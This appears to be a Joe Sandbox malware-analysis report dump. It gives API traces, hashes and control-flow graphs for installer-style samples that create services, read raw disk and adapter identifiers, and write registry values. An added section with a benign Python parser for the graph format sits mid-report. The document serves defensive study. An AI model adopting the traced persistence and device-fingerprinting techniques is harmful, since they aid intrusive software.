                                                                                                                                                          • ReleaseMutex.KERNEL32(00000000,00496E15,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000), ref: 00496DFF
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00496E15,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30), ref: 00496E08
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseDeleteFileHandleMutexRelease
                                                                                                                                                          • String ID: (rI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$qI
                                                                                                                                                          • API String ID: 3841931355-2592930226
                                                                                                                                                          • Opcode ID: 06c17f9a9b5f61430471e78c46d833e475e4080508040f1a2959ed38f776375c
                                                                                                                                                          • Instruction ID: 87198f9731b1192479c04ffe538fefb058e3874758ffd048c95fd336e7cbc4ec
                                                                                                                                                          • Opcode Fuzzy Hash: 06c17f9a9b5f61430471e78c46d833e475e4080508040f1a2959ed38f776375c
                                                                                                                                                          • Instruction Fuzzy Hash: 14F0A7757086449EDF05ABA5E81296E7BB4EB48714FA3087BF414A29C0C63C5D10CE2C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetFocus.USER32(00000000,/sI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464BDA,00000001,00000000,00000000,0046A179), ref: 00421D5B
                                                                                                                                                          • GetFocus.USER32 ref: 00421D69
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Focus
                                                                                                                                                          • String ID: /sI
                                                                                                                                                          • API String ID: 2734777837-3342994382
                                                                                                                                                          • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                                                                                          • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                                                                                                          • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                                                                                          • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456D11
                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(00000000,(rI,00000000,0049A628), ref: 00456D28
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$FileSystem
                                                                                                                                                          • String ID: (rI
                                                                                                                                                          • API String ID: 2086374402-3675663370
                                                                                                                                                          • Opcode ID: 38ab8112d76412924180c6dd247b02616f7c2309d52a52d931fcdc0687e5c145
                                                                                                                                                          • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                                                                                                          • Opcode Fuzzy Hash: 38ab8112d76412924180c6dd247b02616f7c2309d52a52d931fcdc0687e5c145
                                                                                                                                                          • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,0049727E), ref: 0040334B
                                                                                                                                                          • GetCommandLineA.KERNEL32(00000000,0049727E), ref: 00403356
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CommandHandleLineModule
                                                                                                                                                          • String ID: 6r
                                                                                                                                                          • API String ID: 2123368496-4028309143
                                                                                                                                                          • Opcode ID: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                                                                                                          • Instruction ID: 938fc5d7150061a66cd9a397de50459b98cc473a78e96f9e03329754a5f1b6bd
                                                                                                                                                          • Opcode Fuzzy Hash: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                                                                                                          • Instruction Fuzzy Hash: 57C002A09012058AE750AFB6A84AB552A94A751349F8044BFB104BA2E2DA7D82156BDF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1458359878-0
                                                                                                                                                          • Opcode ID: e8daf109569e4807d71bb288e6ea8b254fe6357256af7f31b9cd7c13aeff5911
                                                                                                                                                          • Instruction ID: cc91f638363bcbeec99391655354edaee9a736831669a2751ddb7297f70e897e
                                                                                                                                                          • Opcode Fuzzy Hash: e8daf109569e4807d71bb288e6ea8b254fe6357256af7f31b9cd7c13aeff5911
                                                                                                                                                          • Instruction Fuzzy Hash: 59F0F072A00518774F24E99E9881B2F629CDAC836E710016BED09DF303D438EC8987A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:7.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:4.8%
                                                                                                                                                          Total number of Nodes:419
                                                                                                                                                          Total number of Limit Nodes:10
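The execution graph below is exported as a flat token stream rather than a rendered picture: each node is `<node-id> <hex-address>` followed by the API names the sandbox attributed to that basic block (or a collapsed `<n> API calls` summary for a callee it did not expand), and each edge is `<src-id>-><dst-id>`. The following parser is an added example, not Joe Sandbox code and not part of this report; the grammar is inferred from the token stream on this page, and the embedded sample is a verbatim excerpt of it. It rebuilds nodes and edges and lists the API calls reachable from any node, which is the quickest way to pull out a chain such as OpenSCManagerA / CreateServiceA / StartServiceCtrlDispatcherA / RegCreateKeyExA from a dump like this one without the rendered graph.

```python
"""Parse the execution_graph token stream of a Joe Sandbox report.

Added example (not Joe Sandbox code). Assumed grammar, inferred from the
report text: whitespace-separated tokens of the forms
    <node-id> <hex-address> [<API name> ...] ["<n> API calls"]   (node)
    <src-id>-><dst-id>                                           (edge)
"""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
# Addresses in this report are 6 hex digits (0x40xxxx); node ids are short decimals.
ADDR_RE = re.compile(r"^[0-9a-fA-F]{6,8}$")


@dataclass
class Node:
    addr: str
    apis: List[str] = field(default_factory=list)
    subcalls: Optional[int] = None  # "<n> API calls": collapsed callee summary


# Constructed sample: a verbatim excerpt of this report's execution_graph tokens.
SAMPLE_GRAPH = """
execution_graph 2838 40b745 2841 40212f 2838->2841 2842 40b16c VirtualAlloc 2841->2842
2905 40b0c7 GetModuleFileNameA 2906 40b9aa 2905->2906 2907 402e70 12 API calls 2906->2907 2908 40b9af 2907->2908
2852 40235e 2853 4023b0 2852->2853 2854 402365 2852->2854 2854->2853
2855 402370 GetLastError SetServiceStatus SetEvent 2854->2855 2855->2853
2817 40b212 OpenSCManagerA 2818 40b31f 2817->2818
2958 40259b CreateServiceA 2959 40b1d1 CloseServiceHandle 2958->2959
2835 40219e 2836 40b26d StartServiceCtrlDispatcherA 2835->2836 2837 40b273 2836->2837
2832 4028fd 2833 40b958 RegCreateKeyExA 2832->2833 2834 402305 2833->2834
"""


def parse_execution_graph(text: str) -> Tuple[Dict[int, Node], List[Tuple[int, int]]]:
    """Return ({node_id: Node}, [(src, dst), ...]) from the raw token stream."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes: Dict[int, Node] = {}
    edges: List[Tuple[int, int]] = []
    current: Optional[Node] = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if tok.isdigit():
            # "<n> API calls" is a collapsed-subgraph summary, not a node id
            if i + 2 < len(tokens) and tokens[i + 1] == "API" and tokens[i + 2] == "calls":
                if current is not None:
                    current.subcalls = int(tok)
                i += 3
                continue
            # otherwise a node id whose next token is its address
            if i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
                current = Node(addr=tokens[i + 1].lower())
                nodes[int(tok)] = current
                i += 2
                continue
            i += 1  # node id with no address (dump cut off); skip it
            continue
        if current is not None:  # any other token is an API name of the current node
            current.apis.append(tok)
        i += 1
    return nodes, edges


def reachable_apis(nodes: Dict[int, Node], edges: List[Tuple[int, int]], start: int) -> List[Tuple[str, str]]:
    """BFS from `start` over the edge list; (address, API) pairs in visit order."""
    succ: Dict[int, List[int]] = {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    seen, queue, out = {start}, deque([start]), []
    while queue:
        n = queue.popleft()
        node = nodes.get(n)
        if node is not None:
            out.extend((node.addr, api) for api in node.apis)
        for d in succ.get(n, []):
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return out


def api_index(nodes: Dict[int, Node]) -> Dict[str, List[str]]:
    """Map each API name to the sorted addresses of the blocks that call it."""
    idx: Dict[str, set] = {}
    for node in nodes.values():
        for api in node.apis:
            idx.setdefault(api, set()).add(node.addr)
    return {api: sorted(addrs) for api, addrs in idx.items()}


def entry_nodes(nodes: Dict[int, Node], edges: List[Tuple[int, int]]) -> List[int]:
    """Node ids that are never an edge target, i.e. the graph's roots."""
    targets = {d for _, d in edges}
    return sorted(n for n in nodes if n not in targets)


if __name__ == "__main__":
    g_nodes, g_edges = parse_execution_graph(SAMPLE_GRAPH)
    for root in entry_nodes(g_nodes, g_edges):
        chain = " -> ".join(f"{addr}:{api}" for addr, api in reachable_apis(g_nodes, g_edges, root))
        print(f"root {root} @ {g_nodes[root].addr}: {chain or '(no named APIs)'}")
```

Paste the whole graph block from the report into `parse_execution_graph` in place of the excerpt to get every root's API chain; `api_index` then answers "which blocks call RegSetValueExA" directly. Note that the sandbox only labels APIs it resolved during the run (execution coverage here is 7.6%), so an absent API in the graph is not evidence that the binary lacks it.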
                                                                                                                                                          execution_graph 2838 40b745 2841 40212f 2838->2841 2842 40b16c VirtualAlloc 2841->2842 2905 40b0c7 GetModuleFileNameA 2906 40b9aa 2905->2906 2907 402e70 12 API calls 2906->2907 2908 40b9af 2907->2908 2847 402549 2848 40b894 WaitForSingleObject 2847->2848 2849 402252 2850 402276 GetLastError 2849->2850 2852 40235e 2853 4023b0 2852->2853 2854 402365 2852->2854 2854->2853 2855 402370 GetLastError SetServiceStatus SetEvent 2854->2855 2855->2853 2856 40b060 CloseServiceHandle 2913 404ae0 2916 404ae8 2913->2916 2914 404b7a 2916->2914 2917 4049f0 RtlUnwind 2916->2917 2918 404a08 2917->2918 2918->2916 2922 4022e3 2923 40b1b8 GetModuleFileNameA 2922->2923 2925 4021e5 2926 4022e9 GetProcAddress 2925->2926 2928 40b7f6 2926->2928 2935 405ce7 2936 405cf5 2935->2936 2937 405cf9 LCMapStringW 2936->2937 2938 405cad 2936->2938 2937->2938 2939 405d11 WideCharToMultiByte 2937->2939 2939->2938 2941 404ae8 2942 404b7a 2941->2942 2943 404b06 2941->2943 2943->2942 2944 4049f0 RtlUnwind 2943->2944 2944->2943 2857 405e6b 2858 405e72 2857->2858 2859 405ea3 2858->2859 2860 405e7a MultiByteToWideChar 2858->2860 2860->2859 2861 405e93 GetStringTypeW 2860->2861 2861->2859 2862 40b673 2863 40b679 GetTickCount 2862->2863 2864 40b6a7 2863->2864 2865 402579 2866 40b976 CreateFileA CloseHandle ExitProcess 2865->2866 2945 4024f9 LoadLibraryExA 2821 40417b 2822 404187 GetCurrentProcess TerminateProcess 2821->2822 2823 404198 2821->2823 2822->2823 2824 404212 2823->2824 2825 404202 ExitProcess 2823->2825 2832 4028fd 2833 40b958 RegCreateKeyExA 2832->2833 2834 402305 2833->2834 2867 40267e 2868 40b29b GetModuleHandleA 2867->2868 2869 40277e 2872 401f64 FindResourceA 2869->2872 2871 402783 2873 401f86 GetLastError SizeofResource 2872->2873 2874 401f9f 2872->2874 2873->2874 2875 401fa6 LoadResource LockResource GlobalAlloc 2873->2875 2874->2871 2876 

Control-flow Graph

APIs
• LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
• GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
• FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
Strings
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: Library$AdaptersAddressFreeInfoLoadProc
• String ID: GetAdaptersInfo$iphlpapi.dll$o
• API String ID: 514930453-3667123677
• Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
• Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
• Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
• Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
• DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
• GetLastError.KERNEL32 ref: 00401B0E
• FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
Strings
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
• String ID: \\.\PhysicalDrive0
• API String ID: 3786717961-1180397377
• Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
• Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
• Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
• Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040B26D
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: dfc2fd661b0e71589403a0b6bcb61a3f08b740fc068a52e69b9749f0675b05af
• Instruction ID: c16949dc6f7d92ef07657f06252f9e68f57bbc9334b8c8a67b7c9c0b9e76a263
• Opcode Fuzzy Hash: dfc2fd661b0e71589403a0b6bcb61a3f08b740fc068a52e69b9749f0675b05af
• Instruction Fuzzy Hash: 2EA0027094C105DAD94157605E2C579251CEA0F3967215576510FB40E18B780156657F
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetVersion.KERNEL32 ref: 00402F48
  • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
  • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
• GetCommandLineA.KERNEL32 ref: 00402F96
• GetStartupInfoA.KERNEL32(?), ref: 00402FC1
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
  • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
• String ID:
• API String ID: 2057626494-0
• Opcode ID: c877abccd7b017b2008373a683c45a85b37785b71fb7751b95783a0f91bffb14
• Instruction ID: cc19e24f17b4650914cb2b9af9e4d353f3e23d4ad16f4765f21c486f210011ea
• Opcode Fuzzy Hash: c877abccd7b017b2008373a683c45a85b37785b71fb7751b95783a0f91bffb14
• Instruction Fuzzy Hash: F5219CB09407059ADB08EFA6DE09A6E7BB9EB44304F10413EFA05BB2D1DB384450DB99
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RegQueryValueExA.KERNELBASE ref: 0040261E
• RegCloseKey.KERNELBASE(?), ref: 0040B327
Strings
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: JSON Nested Objects 66
• API String ID: 3356406503-4184186574
• Opcode ID: 1824a804e9f496e40159f017b9fd672c87ce2b4c5c441e96737de9040545891f
• Instruction ID: aa3bd1ae59daaa3fa17d745cbcdd45fda04deab230bb4da5387f22543defac0c
• Opcode Fuzzy Hash: 1824a804e9f496e40159f017b9fd672c87ce2b4c5c441e96737de9040545891f
• Instruction Fuzzy Hash: 67D05E30D48106FAC7005F648F0D22E3AE4AE043447224837A513B40D0C77C8A026A5F
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 87 40417b-404185 88 404187-404192 GetCurrentProcess TerminateProcess 87->88 89 404198-4041ae 87->89 88->89 90 4041b0-4041b7 89->90 91 4041ec-404200 call 404214 89->91 92 4041b9-4041c5 90->92 93 4041db-4041eb call 404214 90->93 99 404212-404213 91->99 100 404202-40420c ExitProcess 91->100 96 4041c7-4041cb 92->96 97 4041da 92->97 93->91 101 4041cd 96->101 102 4041cf-4041d8 96->102 97->93 101->102 102->96 102->97
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 0040418B
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 00404192
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040420C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                          • Opcode ID: 748a27256fc4a66d22ad641d8e31553254a5af63f1a9a9ffed707e388879ca4b
                                                                                                                                                          • Instruction ID: 4cd5c9d7fd323ee9f9fba8b951aaba01e6d7c1133379e8b4a76e772c1e30fa0f
                                                                                                                                                          • Opcode Fuzzy Hash: 748a27256fc4a66d22ad641d8e31553254a5af63f1a9a9ffed707e388879ca4b
                                                                                                                                                          • Instruction Fuzzy Hash: 9101F9B1648300DADA10AF55FD49A0A7BA4EBE0350B10457FF6517B2E1C77AA8D0CF2E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 104 4028bc-4028ce RegOpenKeyExA 105 40b029 104->105 106 40b944 105->106 107 40b02f-40b88e 105->107 109 40b946 106->109 107->106 109->109
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 004028C6
                                                                                                                                                          Strings
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004028BC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Open
                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                          • API String ID: 71445658-2036018995
                                                                                                                                                          • Opcode ID: 8cc03e39f8045248eaf5372112aea73b3a061bbebc5e36400c6faf603829526a
                                                                                                                                                          • Instruction ID: 5db498d58ea0626355dc5c30006fa577db79c1f6cc4ad4aa69c6d3308ce59601
                                                                                                                                                          • Opcode Fuzzy Hash: 8cc03e39f8045248eaf5372112aea73b3a061bbebc5e36400c6faf603829526a
                                                                                                                                                          • Instruction Fuzzy Hash: 60D0C97094810AEAE7109A608E09B7A66ACE704381F204A379C13B12D0D3B9820955AF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 110 40325a-403278 HeapCreate 111 4032b0-4032b2 110->111 112 40327a-403287 call 403112 110->112 115 403296-403299 112->115 116 403289-403294 call 4032b7 112->116 118 4032b3-4032b6 115->118 119 40329b call 403b08 115->119 122 4032a0-4032a2 116->122 119->122 122->118 123 4032a4-4032aa HeapDestroy 122->123 123->111
                                                                                                                                                          APIs
                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                                                                                                            • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 004032AA
                                                                                                                                                            • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2507506473-0
                                                                                                                                                          • Opcode ID: bd4a8705c2f058e6f61ee79851f8c15e955d8a701f491e7a2775f6fe6ed1aa1f
                                                                                                                                                          • Instruction ID: 12b9d923cfd194162cf527058f048946e163d2adb3b2679e6a92d0a0525a53ee
                                                                                                                                                          • Opcode Fuzzy Hash: bd4a8705c2f058e6f61ee79851f8c15e955d8a701f491e7a2775f6fe6ed1aa1f
                                                                                                                                                          • Instruction Fuzzy Hash: BDF065709043015BEF205F316E4A7263EA89B50797F1448BFF501F82D1EB798B90A61A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 124 40258b-40bbdd RegSetValueExA RegCloseKey 127 40bbe3 124->127 127->127
                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExA.KERNELBASE(?), ref: 0040262B
                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040BBDD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3132538880-0
                                                                                                                                                          • Opcode ID: 64bc47f33c90e70bbdf2db1cf44d6d7190741509f106e33f28a2dc8678d8cccb
